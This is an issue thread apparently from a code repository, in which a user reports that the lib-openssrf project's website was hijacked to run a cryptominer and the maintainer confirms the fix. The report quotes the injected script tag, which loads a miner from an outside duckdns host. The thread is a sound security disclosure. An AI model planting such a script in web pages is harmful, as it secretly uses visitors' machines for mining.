### ISSUE TITLE
Your Webpage is CryptoMining

### ISSUE THREAD

**Issue by dataCore** [KeyBridge/lib-openssrf#16]
Check the source-code of your webpage: http://openssrf.org/
There you can find many injected entries to run a miner in the background
'<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>'

**Comment by KeyBridge** [comment]
Thank you for reporting this. The web page was hijacked and a script was inserted. We've resolved the issue by updating the host and DNS authentication. Please advise if you find any other issues.
